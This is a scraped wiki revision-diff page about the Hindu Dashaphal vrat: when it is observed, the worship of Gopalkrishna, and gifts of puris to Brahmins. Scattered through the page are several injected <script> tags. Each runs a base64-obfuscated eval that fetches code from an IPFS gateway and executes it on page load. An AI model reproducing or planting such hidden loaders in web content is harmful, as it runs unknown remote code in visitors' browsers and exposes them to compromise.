Difference between revisions of "दशाफल व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (दशाफलव्रत का नाम बदलकर दशाफल व्रत कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[श्रावण]] [[शुक्ल पक्ष]] की अष्टमी को (अमान्त गणना के अनुसार) यह व्रत किया जाता है।
 
*[[श्रावण]] [[शुक्ल पक्ष]] की अष्टमी को (अमान्त गणना के अनुसार) यह व्रत किया जाता है।
 
*यह व्रत दस वर्षों के लिए किया जाता है।  
 
*यह व्रत दस वर्षों के लिए किया जाता है।  
Line 5: Line 5:
 
*कृष्ण की मूर्ति के समक्ष दस सूत्रों के डोरे को रखा जाता है और उसे हाथ में बाँधा जाता है।
 
*कृष्ण की मूर्ति के समक्ष दस सूत्रों के डोरे को रखा जाता है और उसे हाथ में बाँधा जाता है।
 
*तुलसी की दस पत्तियों (दलों) के साथ हरि के नामों की पूजा की जाती है।
 
*तुलसी की दस पत्तियों (दलों) के साथ हरि के नामों की पूजा की जाती है।
*दस ब्राह्मणों में प्रत्येक को दस-दस पूरियाँ दी जाती हैं।<ref>व्रतार्क व्रतराज (265-269)</ref>
+
*दस ब्राह्मणों में प्रत्येक को दस-दस पूरियाँ दी जाती हैं।<ref>व्रतार्क व्रतराज (265-269</ref>
 
+
{{प्रचार}}
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
+
==टीका टिप्पणी और संदर्भ==
|प्रारम्भिक=
+
<references/>
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==अन्य संबंधित लिंक==
 
==अन्य संबंधित लिंक==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
 
[[Category:व्रत और उत्सव]]
 
[[Category:व्रत और उत्सव]]
 
[[Category:पर्व_और_त्योहार]]
 
[[Category:पर्व_और_त्योहार]]
 
[[Category:संस्कृति कोश]]
 
[[Category:संस्कृति कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:43, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • shravan shukl paksh ki ashtami ko (amant ganana ke anusar) yah vrat kiya jata hai.
  • yah vrat das varshoan ke lie kiya jata hai.
  • is vrat mean gopalkrishna devata ki pooja ki jati hai.
  • krishna ki moorti ke samaksh das sootroan ke dore ko rakha jata hai aur use hath mean baandha jata hai.
  • tulasi ki das pattiyoan (daloan) ke sath hari ke namoan ki pooja ki jati hai.
  • das brahmanoan mean pratyek ko das-das pooriyaan di jati haian.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. vratark vrataraj (265-269

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>